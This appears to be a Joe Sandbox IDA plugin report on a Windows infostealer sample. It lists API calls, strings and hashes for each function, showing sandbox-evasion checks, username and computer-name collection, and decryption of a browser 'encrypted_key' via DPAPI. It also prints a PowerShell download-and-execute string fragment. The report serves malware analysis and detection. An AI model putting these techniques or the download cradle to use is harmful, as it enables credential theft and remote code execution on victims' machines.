Part of subcall function 007E1437: ExitProcess.KERNEL32 ref: 007E1478

Part of subcall function 007E13C7: GetSystemInfo.KERNEL32(?), ref: 007E13D1
Part of subcall function 007E13C7: ExitProcess.KERNEL32 ref: 007E13E5

Part of subcall function 007E1377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 007E1392
Part of subcall function 007E1377: VirtualAllocExNuma.KERNEL32(00000000), ref: 007E1399
Part of subcall function 007E1377: ExitProcess.KERNEL32 ref: 007E13AA

Part of subcall function 007E1487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 007E14A5
Part of subcall function 007E1487: __aulldiv.LIBCMT ref: 007E14BF
Part of subcall function 007E1487: __aulldiv.LIBCMT ref: 007E14CD
Part of subcall function 007E1487: ExitProcess.KERNEL32 ref: 007E14FB

Part of subcall function 007F6477: GetUserDefaultLangID.KERNEL32 ref: 007F647B

Part of subcall function 007E13F7: ExitProcess.KERNEL32 ref: 007E142D

Part of subcall function 007F7557: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007E141E), ref: 007F7587
Part of subcall function 007F7557: RtlAllocateHeap.NTDLL(00000000), ref: 007F758E
Part of subcall function 007F7557: GetUserNameA.ADVAPI32(00000104,00000104), ref: 007F75A6

Part of subcall function 007F75E7: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F7617
Part of subcall function 007F75E7: RtlAllocateHeap.NTDLL(00000000), ref: 007F761E
Part of subcall function 007F75E7: GetComputerNameA.KERNEL32(?,00000104), ref: 007F7636

Part of subcall function 007FA5E7: lstrlen.KERNEL32(?,0062C9F0,?,00424EAC,00420DFF), ref: 007FA5FC
Part of subcall function 007FA5E7: lstrcpy.KERNEL32(00000000), ref: 007FA63B
Part of subcall function 007FA5E7: lstrcat.KERNEL32(00000000,00000000), ref: 007FA649

Part of subcall function 007FA4D7: lstrcpy.KERNEL32(?,00420DFF), ref: 007FA53C

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0062CD40,?,004210DC,?,00000000,?,004210E0,?,00000000,00420ADA), ref: 007F67D1
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 007F67EF
CloseHandle.KERNEL32(00000000), ref: 007F6800
Sleep.KERNEL32(00001770), ref: 007F680B
CloseHandle.KERNEL32(?,00000000,?,0062CD40,?,004210DC,?,00000000,?,004210E0,?,00000000,00420ADA), ref: 007F6821
ExitProcess.KERNEL32 ref: 007F6829

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 2525456742-0
Opcode ID: 897e59dc6e8f6ee96198557eadfba6ffc5bc4383600606c168d6038be0542641
Instruction ID: 06a34ac33bcc0bf27d9def075f26beeaa533a172918077ba2e9690a3e4613365
Opcode Fuzzy Hash: 897e59dc6e8f6ee96198557eadfba6ffc5bc4383600606c168d6038be0542641
Instruction Fuzzy Hash: 14316DB190028CEACB04FBF0DC5EEBD7779AF18300F904518B356A6692DFBC5A05C622

Function 007E9C77 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007E9CA3
GetFileSizeEx.KERNEL32(000000FF,?), ref: 007E9CC8
LocalAlloc.KERNEL32(00000040,?), ref: 007E9CE8
ReadFile.KERNEL32(000000FF,?,00000000,007E16F6,00000000), ref: 007E9D11
LocalFree.KERNEL32(007E16F6), ref: 007E9D47
CloseHandle.KERNEL32(000000FF), ref: 007E9D51

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 30016457b7803b38298d0d11a27270becede90de8f17bde9d86e799b4469262d
Instruction ID: 7b9f4d2c7aa65b631b86be9f98f85065e09187c9aae4af63613a1b88801c79ff
Opcode Fuzzy Hash: 30016457b7803b38298d0d11a27270becede90de8f17bde9d86e799b4469262d
Instruction Fuzzy Hash: 25310BB5A01209EFDB14CF95DC89FEE77B5BF48310F108198E915AB290C778A941CFA1

Function 00409A10 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409A3C
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A61
LocalAlloc.KERNEL32(00000040,?), ref: 00409A81
ReadFile.KERNEL32(000000FF,?,00000000,00410127,00000000), ref: 00409AAA
LocalFree.KERNEL32(00410127), ref: 00409AE0
CloseHandle.KERNEL32(000000FF), ref: 00409AEA

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 05ed42e63fd74b815e84f1989cd72ce9f9ee0e1b6034f55d12926f8b286bbe54
Instruction ID: 9a616c59c25f48dda5b41b64f2eda75996ce8e2783f016847e561ac14b63f668
Opcode Fuzzy Hash: 05ed42e63fd74b815e84f1989cd72ce9f9ee0e1b6034f55d12926f8b286bbe54
Instruction Fuzzy Hash: 5D310AB4A00209EFDB24CF95C895BAE7BB5BF48314F108169E911A73D0D778AD41CFA5

Function 007FC634 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 007FC640

Part of subcall function 007FBBC6: __getptd_noexit.LIBCMT ref: 007FBBC9
Part of subcall function 007FBBC6: __amsg_exit.LIBCMT ref: 007FBBD6

__amsg_exit.LIBCMT ref: 007FC660
__lock.LIBCMT ref: 007FC670
InterlockedDecrement.KERNEL32(?), ref: 007FC68D
??3@YAXPAX@Z.MSVCRT ref: 007FC6A0
InterlockedIncrement.KERNEL32(0042B980), ref: 007FC6B8

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$??3@DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 2174284629-0
Opcode ID: e453a1dcce8868cbd24fcd0ad944226f6b56cd464a6b8d938c0d692add9896ec
Instruction ID: 987b03ee3d4dd2fdba719c14cff23e80fcab47a12ed4e9f106b7a2e468311f60
Opcode Fuzzy Hash: e453a1dcce8868cbd24fcd0ad944226f6b56cd464a6b8d938c0d692add9896ec
Instruction Fuzzy Hash: C001C472A0562DEBC722AF289549B7D7760BF00B50F140115FB04A7391CB3CA941DFDA

Function 0041C3CD Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041C3D9

Part of subcall function 0041B95F: __getptd_noexit.LIBCMT ref: 0041B962
Part of subcall function 0041B95F: __amsg_exit.LIBCMT ref: 0041B96F

__amsg_exit.LIBCMT ref: 0041C3F9
__lock.LIBCMT ref: 0041C409
InterlockedDecrement.KERNEL32(?), ref: 0041C426
free.MSVCRT(?,?,?,00000003,0041B5E0,0042A110,00000008), ref: 0041C439
InterlockedIncrement.KERNEL32(0042B558), ref: 0041C451

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
String ID:
API String ID: 634100517-0
Opcode ID: 2fdf5c7d4d92f1c4697c24f0328f6c8d5b78f7d6ad19cfbac1087b0e86a654cb
Instruction ID: b6f1b0b65aa188883731c215e63f9ee08ae8599addb4a6f87201d1aa76989acc
Opcode Fuzzy Hash: 2fdf5c7d4d92f1c4697c24f0328f6c8d5b78f7d6ad19cfbac1087b0e86a654cb
Instruction Fuzzy Hash: D3010431A826219BD720AB6A9C857EEB760BB04714F41811BE94463391CB3C68D2CFDE

Function 007F6C07 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 007F6C26
??_U@YAPAXI@Z.MSVCRT ref: 007F6C54

Part of subcall function 007F68D7: strlen.MSVCRT ref: 007F68E8
Part of subcall function 007F68D7: strlen.MSVCRT ref: 007F690C

VirtualQueryEx.KERNEL32(007F7014,00000000,?,0000001C), ref: 007F6C99
??_V@YAXPAX@Z.MSVCRT ref: 007F6DBA

Part of subcall function 007F6AE7: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 007F6AFF

Strings

@, xrefs: 007F6CAD

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: strlen$MemoryProcessQueryReadVirtual
String ID: @
API String ID: 2950663791-2766056989
Opcode ID: 4afa45cea5b3bcaab92a32f2428c4a97edc849bca8639b017ecb6fd58acf4104
Instruction ID: bcfdd779d2c095f9c126b83ed5c50ecc9574f1c95a1b074e14ea9a1f800ef72d
Opcode Fuzzy Hash: 4afa45cea5b3bcaab92a32f2428c4a97edc849bca8639b017ecb6fd58acf4104
Instruction Fuzzy Hash: 3C51D4B5A0010DABDF08CF99D881ABFB7B5BB88300F148519FA15A7344D738EA11CBA5

Function 00406A00 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 155libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E7A), ref: 00406A69

Strings

zn@, xrefs: 00406B78, 00406C06, 00406C0B, 00406BB5
zn@, xrefs: 00406A0D, 00406A19, 00406A2C, 00406A35, 00406A59, 00406A82, 00406A85, 00406B3F, 00406B51, 00406B5D, 00406B66, 00406BE3, 00406B99, 00406A9A, 00406ABD, 00406AC9, 00406AF1, 00406B21, 00406B33, 00406AFD, 00406B0A, 00406AA6

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: LibraryLoad
String ID: zn@$zn@
API String ID: 1029625771-1156428846
Opcode ID: 25f82b5059035671600d9e83034a035f120b2cca1b3f6827d3773b31035260a8
Instruction ID: c22392a9749b90d4c1c61cacca4cad5c9228f9bc2143d6a913daecdb3f55fa98
Opcode Fuzzy Hash: 25f82b5059035671600d9e83034a035f120b2cca1b3f6827d3773b31035260a8
Instruction Fuzzy Hash: F171D974A00109DFDB04CF48C484BAAB7B2FF88315F158179E84AAF395C739AA91CF95

Function 007F44C7 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,0062CB0C), ref: 007F4522

Part of subcall function 007F8AE7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007F8B12

lstrcat.KERNEL32(?,00000000), ref: 007F4548
lstrcat.KERNEL32(?,?), ref: 007F4567
lstrcat.KERNEL32(?,?), ref: 007F457B
lstrcat.KERNEL32(?,0062CA84), ref: 007F458E
lstrcat.KERNEL32(?,?), ref: 007F45A2
lstrcat.KERNEL32(?,0062CAC8), ref: 007F45B6

Part of subcall function 007FA377: lstrcpy.KERNEL32(00420DFF,00000000), ref: 007FA3BF

Part of subcall function 007F8A97: GetFileAttributesA.KERNEL32(00000000,?,007E1DFB,?,?,0042554C,?,?,00420E07), ref: 007F8AA6

Part of subcall function 007F42B7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 007F42C7
Part of subcall function 007F42B7: RtlAllocateHeap.NTDLL(00000000), ref: 007F42CE
Part of subcall function 007F42B7: wsprintfA.USER32 ref: 007F42ED
Part of subcall function 007F42B7: FindFirstFileA.KERNEL32(?,?), ref: 007F4304

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 2540262943-0
Opcode ID: f118a971d7adf6bce3c669bbc9ea57bf4f238d65e176d44dae5649571fa366fd
Instruction ID: c926c4909b04b977b1d2c0037b3e49997de95d8052bb50d6afae8ca5fe3202be
Opcode Fuzzy Hash: f118a971d7adf6bce3c669bbc9ea57bf4f238d65e176d44dae5649571fa366fd
Instruction Fuzzy Hash: 363162B290020CE7CB24FBA0DC89EFD773DAB58700F404599B74996191DE7897C9CBA5

Function 00414260 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,0087B7F8), ref: 004142BB

Part of subcall function 00418880: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 004188AB

lstrcat.KERNEL32(?,00000000), ref: 004142E1
lstrcat.KERNEL32(?,?), ref: 00414300
lstrcat.KERNEL32(?,?), ref: 00414314
lstrcat.KERNEL32(?,00848F10), ref: 00414327
lstrcat.KERNEL32(?,?), ref: 0041433B
lstrcat.KERNEL32(?,0087BB68), ref: 0041434F

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 00418830: GetFileAttributesA.KERNEL32(00000000,?,0040FF57,?,00000000,?,00000000,00420D97,00420D96), ref: 0041883F

Part of subcall function 00414050: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414060
Part of subcall function 00414050: HeapAlloc.KERNEL32(00000000), ref: 00414067
Part of subcall function 00414050: wsprintfA.USER32 ref: 00414086
Part of subcall function 00414050: FindFirstFileA.KERNEL32(?,?), ref: 0041409D

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 167551676-0
Opcode ID: 3fe032597e0f313c5c4f0ab01fb9c42c80056ab86df2592af11a04ce8a2306c8
Instruction ID: 4fb66fc9f0e99d4a69d4435a00fe4e0f35192ff1271240cc59f29c1c24f4a50f
Opcode Fuzzy Hash: 3fe032597e0f313c5c4f0ab01fb9c42c80056ab86df2592af11a04ce8a2306c8
Instruction Fuzzy Hash: 663188B290021CA7CB24FBA0DC85EDD773DAB58708F40459EB60596091EE7897C9CFA8

Function 004127A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

ShellExecuteEx.SHELL32(0000003C), ref: 00412895

Strings

<, xrefs: 00412849
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412814
')", xrefs: 004127C3
-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 004127D4

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 3031569214-898575020
Opcode ID: d1e09c6e1fe2f527dd4f14b2ea55249c6ed053211326ac58b78a5a98ab8b52fb
Instruction ID: d376e5d026b6a94438bc85289873f11b5c9f1c1e596dc166cf9a62b6ff5812d0
Opcode Fuzzy Hash: d1e09c6e1fe2f527dd4f14b2ea55249c6ed053211326ac58b78a5a98ab8b52fb
Instruction Fuzzy Hash: 0E412F70D11208AACB14FFA1D896BDDB778AF10318F40411EF41667192EF782AD9CF5A

Function 007E1487 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 007E14A5
__aulldiv.LIBCMT ref: 007E14BF
__aulldiv.LIBCMT ref: 007E14CD
ExitProcess.KERNEL32 ref: 007E14FB

Strings

@, xrefs: 007E149A

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: ea570c17900da72c0ff61e466dfdba6c639ea0a5e55046902d87947f1e012f1f
Instruction ID: dc1bd2c9410946f37c64a6c94fe81d8b9f5efa7fb044bdaacf839ae644f52af5
Opcode Fuzzy Hash: ea570c17900da72c0ff61e466dfdba6c639ea0a5e55046902d87947f1e012f1f
Instruction Fuzzy Hash: 86016DB0941348EBEF20EBD1CC4AB9DBBB9AB04705F608049F705BA3C1D7799981C759

Function 004108A0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004108C8
strtok_s.MSVCRT ref: 00410A0D

Part of subcall function 0041A1F0: lstrlenA.KERNEL32(00000000,?,?,00415634,00420AC3,00420AC2,?,?,004165B6,00000000,?,00845518,?,004210DC,?,00000000), ref: 0041A1FB
Part of subcall function 0041A1F0: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A255

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: fbf8425dbd9a21fbb2d3347ebf256bb661924f14147701d3124d8c50ced1ac80
Instruction ID: a4e7387e48c2c71d0e19e82ff460fffa0707391e6f0b4b4f43623f0e69075298
Opcode Fuzzy Hash: fbf8425dbd9a21fbb2d3347ebf256bb661924f14147701d3124d8c50ced1ac80
Instruction Fuzzy Hash: 62515AB5A04209DFCB08CF54D495AEE7BB5FF58308F10806AE802AB351D774EAD1CB95

Function 00409E60 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 115memoryCOMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 00409E7B
memset.MSVCRT ref: 00409EAE
LocalAlloc.KERNEL32(00000040,?), ref: 00409EFE

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A1F0: lstrlenA.KERNEL32(00000000,?,?,00415634,00420AC3,00420AC2,?,?,004165B6,00000000,?,00845518,?,004210DC,?,00000000), ref: 0041A1FB
Part of subcall function 0041A1F0: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A255

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Strings

v10, xrefs: 00409E72
@, xrefs: 00409EB7

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: lstrcpy$AllocLocallstrlenmemcmpmemset
String ID: @$v10
API String ID: 1400469952-24753345
Opcode ID: fde80401d7ca0c130be09c763633a7414a1c5227c78c8aee95754bea7b786677
Instruction ID: 07f8737455eafbd8f61b9e4d9b284130f9ce7af93f488edb76ba3c8551e2a7c8
Opcode Fuzzy Hash: fde80401d7ca0c130be09c763633a7414a1c5227c78c8aee95754bea7b786677
Instruction Fuzzy Hash: 23414870A0020CEBCB04DFA4CC99BEE77B5BF44304F108029F905AB295DBB8AD45CB99

Function 00409D30 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 00409A10: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409A3C
Part of subcall function 00409A10: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A61
Part of subcall function 00409A10: LocalAlloc.KERNEL32(00000040,?), ref: 00409A81
Part of subcall function 00409A10: ReadFile.KERNEL32(000000FF,?,00000000,00410127,00000000), ref: 00409AAA
Part of subcall function 00409A10: LocalFree.KERNEL32(00410127), ref: 00409AE0
Part of subcall function 00409A10: CloseHandle.KERNEL32(000000FF), ref: 00409AEA

Part of subcall function 004188D0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004188F2

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D89

Part of subcall function 00409B10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 00409B3F
Part of subcall function 00409B10: LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 00409B51
Part of subcall function 00409B10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 00409B7A
Part of subcall function 00409B10: LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 00409B8F

memcmp.MSVCRT ref: 00409DE2

Part of subcall function 00409BB0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409BD4
Part of subcall function 00409BB0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BF3
Part of subcall function 00409BB0: memcpy.MSVCRT ref: 00409C16
Part of subcall function 00409BB0: LocalFree.KERNEL32(?), ref: 00409C23

Strings

"encrypted_key":", xrefs: 00409D80
, xrefs: 00409E11
DPAPI, xrefs: 00409DD9

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 3731072634-738592651
Opcode ID: 3c11c3202ec05f2f7b971d58f229e2e6d0653ecb1e2d3c216bf425453a2b8c3a
Instruction ID: 7f392d33d6ad21de2d61bb21213a98381b23072c845d074b64d64ac31095145a
Opcode Fuzzy Hash: 3c11c3202ec05f2f7b971d58f229e2e6d0653ecb1e2d3c216bf425453a2b8c3a
Instruction Fuzzy Hash: 7A3150B5D00108ABCB04DBE4DC45AEF77B8AF48304F44856AE915B3282E7789E44CBA5

Function 007FC78F Relevance: 7.6, APIs: 5, Instructions: 94COMMON

Download Yara Rule

APIs

IsValidCodePage.KERNEL32 ref: 007FC7C7
GetCPInfo.KERNEL32(?,?), ref: 007FC7DA
memset.MSVCRT ref: 007FC7F2
setSBUpLow.LIBCMT ref: 007FC8C8

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValidmemset
String ID:
API String ID: 703783727-0
Opcode ID: defb6aa65e87e8a69a741c1c99ece6db460d24d6b5f2d6adc1547c2693f8506e
Instruction ID: 48924c9dc3fa23397857c0812d5cf987cf6f2084da99c25ebed630fa75125576
Opcode Fuzzy Hash: defb6aa65e87e8a69a741c1c99ece6db460d24d6b5f2d6adc1547c2693f8506e
Instruction Fuzzy Hash: D3313870A0429D9EEB27DF39CD952B9BFA09F02310B1841BADA82CF392C26CC805D751

Function 007F6627 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 007F6673
sscanf.NTDLL ref: 007F66A0
